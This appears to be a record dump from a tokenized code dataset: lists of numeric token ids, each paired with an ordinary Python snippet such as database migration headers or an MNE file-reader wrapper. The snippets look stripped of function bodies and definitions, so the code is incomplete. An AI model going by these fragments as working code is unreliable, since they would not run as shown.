13225, 278, 6030, 11, 198, 220, 220, 220, 3395, 14706, 6030, 11, 198, 220, 220, 220, 4718, 864, 18843, 1352, 11, 198, 220, 220, 220, 520, 1850, 12360, 6030, 9012, 11, 198, 8, 198, 6738, 764, 35350, 1330, 357, 198, 220, 220, 220, 4403, 20746, 15878, 11, 198, 220, 220, 220, 4403, 20746, 9218, 11, 198, 220, 220, 220, 4403, 20746, 29046, 11, 198, 220, 220, 220, 4403, 20746, 10962, 11, 198, 220, 220, 220, 10130, 31425, 8979, 7248, 11, 198, 220, 220, 220, 10130, 31425, 29046, 11, 198, 220, 220, 220, 10130, 31425, 15235, 11, 198, 220, 220, 220, 10130, 31425, 3041, 25636, 8979, 7248, 11, 198, 220, 220, 220, 8562, 12360, 6030, 11, 198, 220, 220, 220, 16092, 459, 382, 9218, 11, 198, 220, 220, 220, 16092, 459, 382, 29046, 11, 198, 220, 220, 220, 20885, 7390, 11, 198, 220, 220, 220, 7663, 7390, 11, 198, 220, 220, 220, 29481, 29046, 11, 198, 220, 220, 220, 14151, 6030, 11, 198, 220, 220, 220, 7383, 11, 198, 220, 220, 220, 14927, 16870, 2234, 11, 198, 220, 220, 220, 2142, 653, 7390, 11, 198, 220, 220, 220, 13266, 9218, 11, 198, 220, 220, 220, 20514, 16934, 11, 198, 220, 220, 220, 520, 1850, 6030, 11, 198, 220, 220, 220, 8655, 29046, 11, 198, 220, 220, 220, 9220, 6030, 11, 198, 220, 220, 220, 4525, 11935, 11, 198, 8, 198, 198, 834, 439, 834, 796, 357, 198, 220, 220, 220, 366, 12502, 1600, 198, 220, 220, 220, 366, 25526, 378, 33308, 48344, 18453, 1600, 198, 220, 220, 220, 366, 37702, 2736, 6601, 7416, 49, 1984, 24259, 1600, 198, 220, 220, 220, 366, 33, 9969, 14253, 1600, 198, 220, 220, 220, 366, 33, 1347, 13629, 16934, 1600, 198, 220, 220, 220, 366, 40778, 19746, 7449, 1600, 198, 220, 220, 220, 366, 34, 21130, 35, 34431, 33308, 18453, 1600, 198, 220, 220, 220, 366, 27275, 45195, 16934, 1600, 198, 220, 220, 220, 366, 1925, 945, 2514, 32916, 382, 1600, 198, 220, 220, 220, 366, 10258, 1600, 198, 220, 220, 220, 366, 29869, 1600, 198, 220, 220, 220, 366, 19746, 7449, 1600, 198, 220, 220, 220, 366, 19746, 14749, 1600, 198, 220, 220, 220, 366, 16447, 5005, 738, 1958, 30800, 18453, 1600, 198, 220, 220, 220, 366, 16447, 35, 34431, 33308, 18453, 1600, 198, 220, 220, 220, 366, 16447, 818, 4443, 30800, 18453, 1600, 198, 220, 220, 220, 366, 16447, 33308, 48344, 18453, 1600, 198, 220, 220, 220, 366, 16447, 1273, 1850, 12360, 6030, 18453, 1600, 198, 220, 220, 220, 366, 23919, 78, 35, 2357, 49228, 16934, 1600, 198, 220, 220, 220, 366, 23919, 78, 26257, 16934, 1600, 198, 220, 220, 220, 366, 23919, 78, 9218, 1600, 198, 220, 220, 220, 366, 23919, 78, 3041, 5372, 37, 21373, 37, 431, 16934, 1600, 198, 220, 220, 220, 366, 10430, 33377, 16934, 1600, 198, 220, 220, 220, 366, 10430, 7575, 1600, 198, 220, 220, 220, 366, 5005, 738, 1958, 16934, 1600, 198, 220, 220, 220, 366, 5005, 738, 1958, 19746, 18453, 1600, 198, 220, 220, 220, 366, 5005, 738, 1958, 19746, 31077, 1600, 198, 220, 220, 220, 366, 5005, 738, 1958, 30800, 1600, 198, 220, 220, 220, 366, 38727, 5005, 738, 1958, 30800, 18453, 1600, 198, 220, 220, 220, 366, 38727, 35, 34431, 33308, 18453, 1600, 198, 220, 220, 220, 366, 38727, 818, 4443, 30800, 18453, 1600, 198, 220, 220, 220, 366, 38727, 33308, 48344, 18453, 1600, 198, 220, 220, 220, 366, 38727, 1273, 1850, 12360, 6030, 18453, 1600, 198, 220, 220, 220, 366, 35, 34431, 33308, 1600, 198, 220, 220, 220, 366, 24941, 14749, 1600, 198, 220, 220, 220, 366, 12331, 1600, 198, 220, 220, 220, 366, 3109, 9152, 12360, 31431, 1600, 198, 220, 220, 220, 366, 3109, 4717, 31929, 1600, 198, 220, 220, 220, 366, 15878, 8291, 1161, 1600, 198, 220, 220, 220, 366, 36276, 1600, 198, 220, 220, 220, 366, 48658, 35, 34431, 33308, 18453, 1600, 198, 220, 220, 220, 366, 13715, 10699, 33, 1347, 13629, 16934, 1600, 198, 220, 220, 220, 366, 3855, 5005, 738, 1958, 30800, 18453, 1600, 198, 220, 220, 220, 366, 3855, 35, 34431, 33308, 18453, 1600, 198, 220, 220, 220, 366, 3855, 818, 4443, 30800, 18453, 1600, 198, 220, 220, 220, 366, 3855, 33308, 48344, 18453, 1600, 198, 220, 220, 220, 366, 3855, 1273, 1850, 12360, 6030, 18453, 1600, 198, 220, 220, 220, 366, 21217, 10236, 19746, 7449, 1600, 198, 220, 220, 220, 366, 21217, 10236, 36276, 24259, 1600, 198, 220, 220, 220, 366, 21217, 10236, 818, 4443, 35, 34431, 33308, 18453, 1600, 198, 220, 220, 220, 366, 21217, 10236, 818, 4443, 33308, 48344, 18453, 1600, 198, 220, 220, 220, 366, 21217, 10236, 818, 4443, 31077, 1600, 198, 220, 220, 220, 366, 21217, 10236, 818, 4443, 48346, 1600, 198, 220, 220, 220, 366, 5159, 14749, 1600, 198, 220, 220, 220, 366, 12360, 6030, 11828, 1600, 198, 220, 220, 220, 366, 12360, 6030, 29668, 1600, 198, 220, 220, 220, 366, 12360, 6030, 41762, 602, 1600, 198, 220, 220, 220, 366, 818, 4443, 16934, 1600, 198, 220, 220, 220, 366, 818, 4443, 19746, 18453, 1600, 198, 220, 220, 220, 366, 818, 4443, 19746, 31077, 1600, 198, 220, 220, 220, 366, 818, 4443, 6601, 7416, 24259, 1600, 198, 220, 220, 220, 366, 818, 31308, 31929, 1600, 198, 220, 220, 220, 366, 818, 31308, 31929, 7248, 1600, 198, 220, 220, 220, 366, 818, 4443, 33308, 16934, 1600, 198, 220, 220, 220, 366, 818, 4443, 23004, 1600, 198, 220, 220, 220, 366, 818, 4443, 30800, 1600, 198, 220, 220, 220, 366, 33308, 48344, 1600, 198, 220, 220, 220, 366, 42, 907, 36918, 1496, 23919, 78, 9218, 1600, 198, 220, 220, 220, 366, 21968, 15022, 35, 14188, 16934, 1600, 198, 220, 220, 220, 366, 21968, 15022, 35, 14188, 29668, 1600, 198, 220, 220, 220, 366, 8053, 5005, 738, 1958, 12966, 17041, 18453, 1600, 198, 220, 220, 220, 366, 8053, 5005, 738, 1958, 12966, 17041, 31077, 1600, 198, 220, 220, 220, 366, 8053, 35, 34431, 41, 8158, 18453, 1600, 198, 220, 220, 220, 366, 8053, 35, 34431, 41, 8158, 31077, 1600, 198, 220, 220, 220, 366, 8053, 12360, 31431, 18453, 1600, 198, 220, 220, 220, 366, 8053, 12360, 31431, 31077, 1600, 198, 220, 220, 220, 366, 8053, 818, 4443, 12966, 17041, 18453, 1600, 198, 220, 220, 220, 366, 8053, 818, 4443, 12966, 17041, 31077, 1600, 198, 220, 220, 220, 366, 8053, 33308, 2898, 328, 5355, 18453, 1600, 198, 220, 220, 220, 366, 8053, 33308, 2898, 328, 5355, 31077, 1600, 198, 220, 220, 220, 366, 8053, 1273, 1850, 12360, 31431, 18453, 1600, 198, 220, 220, 220, 366, 8053, 1273, 1850, 12360, 31431, 31077, 1600, 198, 220, 220, 220, 366, 14749, 1600, 198, 220, 220, 220, 366, 5124, 723, 1600, 198, 220, 220, 220, 366, 9171, 14706, 14749, 1600, 198, 220, 220, 220, 366, 26410, 31425, 16934, 1600, 198, 220, 220, 220, 366, 23828, 1800, 8291, 1161, 1600, 198, 220, 220, 220, 366, 48948, 9171, 1173, 1600, 198, 220, 220, 220, 366, 4507, 17053, 7390, 1600, 198, 220, 220, 220, 366, 25178, 12360, 1600, 198, 220, 220, 220, 366, 17257, 1600, 198, 220, 220, 220, 366, 23739, 48362, 1600, 198, 220, 220, 220, 366, 23739, 14749, 1600, 198, 220, 220, 220, 366, 23739, 15979, 2234, 1600, 198, 220, 220, 220, 366, 23739, 41762, 602, 1600, 198, 220, 220, 220, 366, 7738, 529, 16934, 1600, 198, 220, 220, 220, 366, 7738, 529, 5159, 18453, 1600, 198, 220, 220, 220, 366, 7738, 529, 5159, 31077, 1600, 198, 220, 220, 220, 366, 3041, 738, 1958, 19746, 18453, 1600, 198, 220, 220, 220, 366, 3041, 738, 1958, 19746, 31077, 1600, 198, 220, 220, 220, 366, 3041, 5372, 35, 14188, 16934, 1600, 198, 220, 220, 220, 366, 3041, 5372, 11395, 16934, 1600, 198, 220, 220, 220, 366, 3041, 5372, 3152, 12360, 6030, 16934, 1600, 198, 220, 220, 220, 366, 49, 1984, 32750, 33308, 16934, 1600, 198, 220, 220, 220, 366, 27054, 5950, 1600, 198, 220, 220, 220, 366, 17126, 19929, 10962, 1600, 198, 220, 220, 220, 366, 31425, 9171, 14706, 33986, 1600, 198, 220, 220, 220, 366, 1273, 1850, 12360, 6030, 1600, 198, 220, 220, 220, 366, 1273, 1850, 12360, 6030, 16934, 1600, 198, 220, 220, 220, 366, 1273, 1850, 12360, 6030, 29668, 1600, 198, 220, 220, 220, 366, 1273, 1850, 12360, 6030, 14815, 1600, 198, 220, 220, 220, 366, 10962, 1600, 198, 220, 220, 220, 366, 10962, 14749, 1600, 198, 220, 220, 220, 366, 7575, 7841, 16934, 1600, 198, 220, 220, 220, 366, 8291, 1161, 12331, 12885, 1359, 1600, 198, 220, 220, 220, 366, 8291, 1161, 29064, 1600, 198, 220, 220, 220, 366, 8291, 1161, 22093, 1600, 198, 220, 220, 220, 366, 8291, 1153, 23919, 78, 9218, 1600, 198, 220, 220, 220, 366, 3118, 29988, 1496, 23919, 78, 9218, 1600, 198, 220, 220, 220, 366, 10260, 5005, 738, 1958, 30800, 18453, 1600, 198, 220, 220, 220, 366, 10260, 818, 4443, 30800, 18453, 1600, 198, 220, 220, 220, 366, 10260, 33308, 48344, 18453, 1600, 198, 220, 220, 220, 366, 10260, 1273, 1850, 12360, 6030, 18453, 1600, 198, 220, 220, 220, 366, 11395, 1600, 198, 220, 220, 220, 366, 11395, 37, 28707, 1600, 198, 220, 220, 220, 366, 19746, 19722, 1600, 198, 220, 220, 220, 366, 35, 34431, 33308, 6030, 1600, 198, 220, 220, 220, 366, 12360, 6030, 48181, 3886, 1600, 198, 220, 220, 220, 366, 44, 19775, 6030, 1600, 198, 220, 220, 220, 366, 9171, 14706, 6030, 1600, 198, 220, 220, 220, 366, 6892, 864, 18843, 1352, 1600, 198, 220, 220, 220, 366, 1273, 1850, 12360, 6030, 9012, 1600, 198, 220, 220, 220, 366, 12804, 20746, 15878, 1600, 198, 220, 220, 220, 366, 12804, 20746, 9218, 1600, 198, 220, 220, 220, 366, 12804, 20746, 29046, 1600, 198, 220, 220, 220, 366, 12804, 20746, 10962, 1600, 198, 220, 220, 220, 366, 18839, 31425, 8979, 7248, 1600, 198, 220, 220, 220, 366, 18839, 31425, 29046, 1600, 198, 220, 220, 220, 366, 18839, 31425, 15235, 1600, 198, 220, 220, 220, 366, 18839, 31425, 3041, 25636, 8979, 7248, 1600, 198, 220, 220, 220, 366, 15022, 12360, 6030, 1600, 198, 220, 220, 220, 366, 27354, 459, 382, 9218, 1600, 198, 220, 220, 220, 366, 27354, 459, 382, 29046, 1600, 198, 220, 220, 220, 366, 32398, 7390, 1600, 198, 220, 220, 220, 366, 15878, 7390, 1600, 198, 220, 220, 220, 366, 21217, 10236, 29046, 1600, 198, 220, 220, 220, 366, 12360, 6030, 1600, 198, 220, 220, 220, 366, 9218, 1600, 198, 220, 220, 220, 366, 35854, 16870, 2234, 1600, 198, 220, 220, 220, 366, 7841, 653, 7390, 1600, 198, 220, 220, 220, 366, 23739, 9218, 1600, 198, 220, 220, 220, 366, 31425, 16934, 1600, 198, 220, 220, 220, 366, 1273, 1850, 6030, 1600, 198, 220, 220, 220, 366, 10962, 29046, 1600, 198, 220, 220, 220, 366, 8979, 6030, 1600, 198, 220, 220, 220, 366, 7594, 11935, 1600, 198, 8, 198 ]
2.696989
3,089
__author__ = 'wenbin'
[ 834, 9800, 834, 796, 705, 21006, 8800, 6, 198 ]
2.444444
9
"""empty message Revision ID: e96fe0cc3a92 Revises: f1ffa6279209 Create Date: 2017-07-19 09:03:31.402092 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'e96fe0cc3a92' down_revision = 'f1ffa6279209' branch_labels = None depends_on = None
[ 37811, 28920, 3275, 198, 198, 18009, 1166, 4522, 25, 304, 4846, 5036, 15, 535, 18, 64, 5892, 198, 18009, 2696, 25, 277, 16, 487, 64, 21, 26050, 22567, 198, 16447, 7536, 25, 2177, 12, 2998, 12, 1129, 7769, 25, 3070, 25, 3132, 13, 1821, 1238, 5892, 198, 198, 37811, 198, 6738, 31341, 2022, 291, 1330, 1034, 198, 11748, 44161, 282, 26599, 355, 473, 628, 198, 2, 18440, 42814, 11, 973, 416, 9300, 2022, 291, 13, 198, 260, 10178, 796, 705, 68, 4846, 5036, 15, 535, 18, 64, 5892, 6, 198, 2902, 62, 260, 10178, 796, 705, 69, 16, 487, 64, 21, 26050, 22567, 6, 198, 1671, 3702, 62, 23912, 1424, 796, 6045, 198, 10378, 2412, 62, 261, 796, 6045, 628, 198 ]
2.471074
121
# ---------------------------------------------------------------------- # event lifecycle # ---------------------------------------------------------------------- # Copyright (C) 2007-2019 The NOC Project # See LICENSE for details # ---------------------------------------------------------------------- # Third-party modules from django.db import models # NOC modules from noc.core.migration.base import BaseMigration
[ 2, 16529, 23031, 198, 2, 1785, 3868, 47510, 198, 2, 16529, 23031, 198, 2, 15069, 357, 34, 8, 4343, 12, 23344, 383, 399, 4503, 4935, 198, 2, 4091, 38559, 24290, 329, 3307, 198, 2, 16529, 23031, 198, 198, 2, 10467, 12, 10608, 13103, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 198, 2, 399, 4503, 13103, 198, 6738, 299, 420, 13, 7295, 13, 76, 4254, 13, 8692, 1330, 7308, 44, 4254, 628 ]
5.794521
73
"""Generic wrapper function read_raw for specific read_raw_xxx readers.""" # Authors: Clemens Brunner <[email protected]> # # License: BSD (3-clause) from pathlib import Path from functools import partial from . import (read_raw_edf, read_raw_bdf, read_raw_gdf, read_raw_brainvision, read_raw_fif, read_raw_eeglab, read_raw_cnt, read_raw_egi, read_raw_eximia, read_raw_nirx, read_raw_fieldtrip, read_raw_artemis123, read_raw_nicolet, read_raw_kit, read_raw_ctf, read_raw_boxy) from ..utils import fill_doc # supported read file formats supported = {".edf": read_raw_edf, ".bdf": read_raw_bdf, ".gdf": read_raw_gdf, ".vhdr": read_raw_brainvision, ".fif": read_raw_fif, ".fif.gz": read_raw_fif, ".set": read_raw_eeglab, ".cnt": read_raw_cnt, ".mff": read_raw_egi, ".nxe": read_raw_eximia, ".hdr": read_raw_nirx, ".mat": read_raw_fieldtrip, ".bin": read_raw_artemis123, ".data": read_raw_nicolet, ".sqd": read_raw_kit, ".ds": read_raw_ctf, ".txt": read_raw_boxy} # known but unsupported file formats suggested = {".vmrk": partial(_read_unsupported, suggest=".vhdr"), ".eeg": partial(_read_unsupported, suggest=".vhdr")} # all known file formats readers = {**supported, **suggested} @fill_doc def read_raw(fname, *, preload=False, verbose=None, **kwargs): """Read raw file. This function is a convenient wrapper for readers defined in `mne.io`. The correct reader is automatically selected based on the detected file format. All function arguments are passed to the respective reader. The following readers are currently supported: `~mne.io.read_raw_artemis123`, `~mne.io.read_raw_bdf`, `~mne.io.read_raw_boxy`, `~mne.io.read_raw_brainvision`, `~mne.io.read_raw_cnt`, `~mne.io.read_raw_ctf`, `~mne.io.read_raw_edf`, `~mne.io.read_raw_eeglab`, `~mne.io.read_raw_egi`, `~mne.io.read_raw_eximia`, `~mne.io.read_raw_fieldtrip`, `~mne.io.read_raw_fif`, `~mne.io.read_raw_gdf`, `~mne.io.read_raw_kit`, `~mne.io.read_raw_nicolet`, and `~mne.io.read_raw_nirx`. Parameters ---------- fname : path-like Name of the file to read. %(preload)s %(verbose)s **kwargs Additional keyword arguments to pass to the underlying reader. For details, see the arguments of the reader for the respective file format. Returns ------- raw : mne.io.Raw Raw object. """ ext = "".join(Path(fname).suffixes) if ext in readers: return readers[ext](fname, preload=preload, verbose=verbose, **kwargs) else: _read_unsupported(fname)
[ 37811, 46189, 29908, 2163, 1100, 62, 1831, 329, 2176, 1100, 62, 1831, 62, 31811, 7183, 526, 15931, 198, 198, 2, 46665, 25, 3779, 45535, 15700, 1008, 1279, 2375, 45535, 13, 1671, 403, 1008, 31, 14816, 13, 785, 29, 198, 2, 198, 2, 13789, 25, 347, 10305, 357, 18, 12, 565, 682, 8, 628, 198, 6738, 3108, 8019, 1330, 10644, 198, 6738, 1257, 310, 10141, 1330, 13027, 198, 198, 6738, 764, 1330, 357, 961, 62, 1831, 62, 276, 69, 11, 1100, 62, 1831, 62, 65, 7568, 11, 1100, 62, 1831, 62, 70, 7568, 11, 1100, 62, 1831, 62, 27825, 10178, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1100, 62, 1831, 62, 32041, 11, 1100, 62, 1831, 62, 1453, 4743, 397, 11, 1100, 62, 1831, 62, 66, 429, 11, 1100, 62, 1831, 62, 1533, 72, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1100, 62, 1831, 62, 1069, 320, 544, 11, 1100, 62, 1831, 62, 32986, 87, 11, 1100, 62, 1831, 62, 3245, 39813, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1100, 62, 1831, 62, 433, 30561, 10163, 11, 1100, 62, 1831, 62, 77, 3713, 1616, 11, 1100, 62, 1831, 62, 15813, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1100, 62, 1831, 62, 310, 69, 11, 1100, 62, 1831, 62, 3524, 88, 8, 198, 6738, 11485, 26791, 1330, 6070, 62, 15390, 628, 198, 198, 2, 4855, 1100, 2393, 17519, 198, 15999, 796, 1391, 1911, 276, 69, 1298, 1100, 62, 1831, 62, 276, 69, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 65, 7568, 1298, 1100, 62, 1831, 62, 65, 7568, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 70, 7568, 1298, 1100, 62, 1831, 62, 70, 7568, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 85, 71, 7109, 1298, 1100, 62, 1831, 62, 27825, 10178, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 32041, 1298, 1100, 62, 1831, 62, 32041, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 32041, 13, 34586, 1298, 1100, 62, 1831, 62, 32041, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 2617, 1298, 1100, 62, 1831, 62, 1453, 4743, 397, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 66, 429, 1298, 1100, 62, 1831, 62, 66, 429, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 76, 487, 1298, 1100, 62, 1831, 62, 1533, 72, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 77, 27705, 1298, 1100, 62, 1831, 62, 1069, 320, 544, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 71, 7109, 1298, 1100, 62, 1831, 62, 32986, 87, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 6759, 1298, 1100, 62, 1831, 62, 3245, 39813, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 8800, 1298, 1100, 62, 1831, 62, 433, 30561, 10163, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 7890, 1298, 1100, 62, 1831, 62, 77, 3713, 1616, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 31166, 67, 1298, 1100, 62, 1831, 62, 15813, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 9310, 1298, 1100, 62, 1831, 62, 310, 69, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 14116, 1298, 1100, 62, 1831, 62, 3524, 88, 92, 198, 198, 2, 1900, 475, 24222, 2393, 17519, 198, 47811, 276, 796, 1391, 1911, 14761, 81, 74, 1298, 13027, 28264, 961, 62, 403, 15999, 11, 1950, 28, 1911, 85, 71, 7109, 12340, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 27071, 1453, 70, 1298, 13027, 28264, 961, 62, 403, 15999, 11, 1950, 28, 1911, 85, 71, 7109, 4943, 92, 198, 198, 2, 477, 1900, 2393, 17519, 198, 961, 364, 796, 1391, 1174, 15999, 11, 12429, 47811, 276, 92, 628, 198, 31, 20797, 62, 15390, 198, 4299, 1100, 62, 1831, 7, 69, 3672, 11, 1635, 11, 662, 2220, 28, 25101, 11, 15942, 577, 28, 14202, 11, 12429, 46265, 22046, 2599, 198, 220, 220, 220, 37227, 5569, 8246, 2393, 13, 628, 220, 220, 220, 770, 2163, 318, 257, 11282, 29908, 329, 7183, 5447, 287, 4600, 76, 710, 13, 952, 44646, 383, 198, 220, 220, 220, 3376, 9173, 318, 6338, 6163, 1912, 319, 262, 12326, 2393, 5794, 13, 198, 220, 220, 220, 1439, 2163, 7159, 389, 3804, 284, 262, 11756, 9173, 13, 628, 220, 220, 220, 383, 1708, 7183, 389, 3058, 4855, 25, 628, 220, 220, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 433, 30561, 10163, 47671, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 65, 7568, 47671, 198, 220, 220, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 3524, 88, 47671, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 27825, 10178, 47671, 198, 220, 220, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 66, 429, 47671, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 310, 69, 47671, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 276, 69, 47671, 198, 220, 220, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 1453, 4743, 397, 47671, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 1533, 72, 47671, 198, 220, 220, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 1069, 320, 544, 47671, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 3245, 39813, 47671, 198, 220, 220, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 32041, 47671, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 70, 7568, 47671, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 15813, 47671, 198, 220, 220, 220, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 77, 3713, 1616, 47671, 290, 4600, 93, 76, 710, 13, 952, 13, 961, 62, 1831, 62, 32986, 87, 44646, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 277, 3672, 1058, 3108, 12, 2339, 198, 220, 220, 220, 220, 220, 220, 220, 6530, 286, 262, 2393, 284, 1100, 13, 198, 220, 220, 220, 4064, 7, 3866, 2220, 8, 82, 198, 220, 220, 220, 4064, 7, 19011, 577, 8, 82, 198, 220, 220, 220, 12429, 46265, 22046, 198, 220, 220, 220, 220, 220, 220, 220, 15891, 21179, 7159, 284, 1208, 284, 262, 10238, 9173, 13, 1114, 198, 220, 220, 220, 220, 220, 220, 220, 3307, 11, 766, 262, 7159, 286, 262, 9173, 329, 262, 11756, 2393, 198, 220, 220, 220, 220, 220, 220, 220, 5794, 13, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 8246, 1058, 285, 710, 13, 952, 13, 27369, 198, 220, 220, 220, 220, 220, 220, 220, 16089, 2134, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1070, 796, 366, 1911, 22179, 7, 15235, 7, 69, 3672, 737, 37333, 844, 274, 8, 198, 220, 220, 220, 611, 1070, 287, 7183, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 7183, 58, 2302, 16151, 69, 3672, 11, 662, 2220, 28, 3866, 2220, 11, 15942, 577, 28, 19011, 577, 11, 12429, 46265, 22046, 8, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 4808, 961, 62, 403, 15999, 7, 69, 3672, 8, 198 ]
2.144144
1,332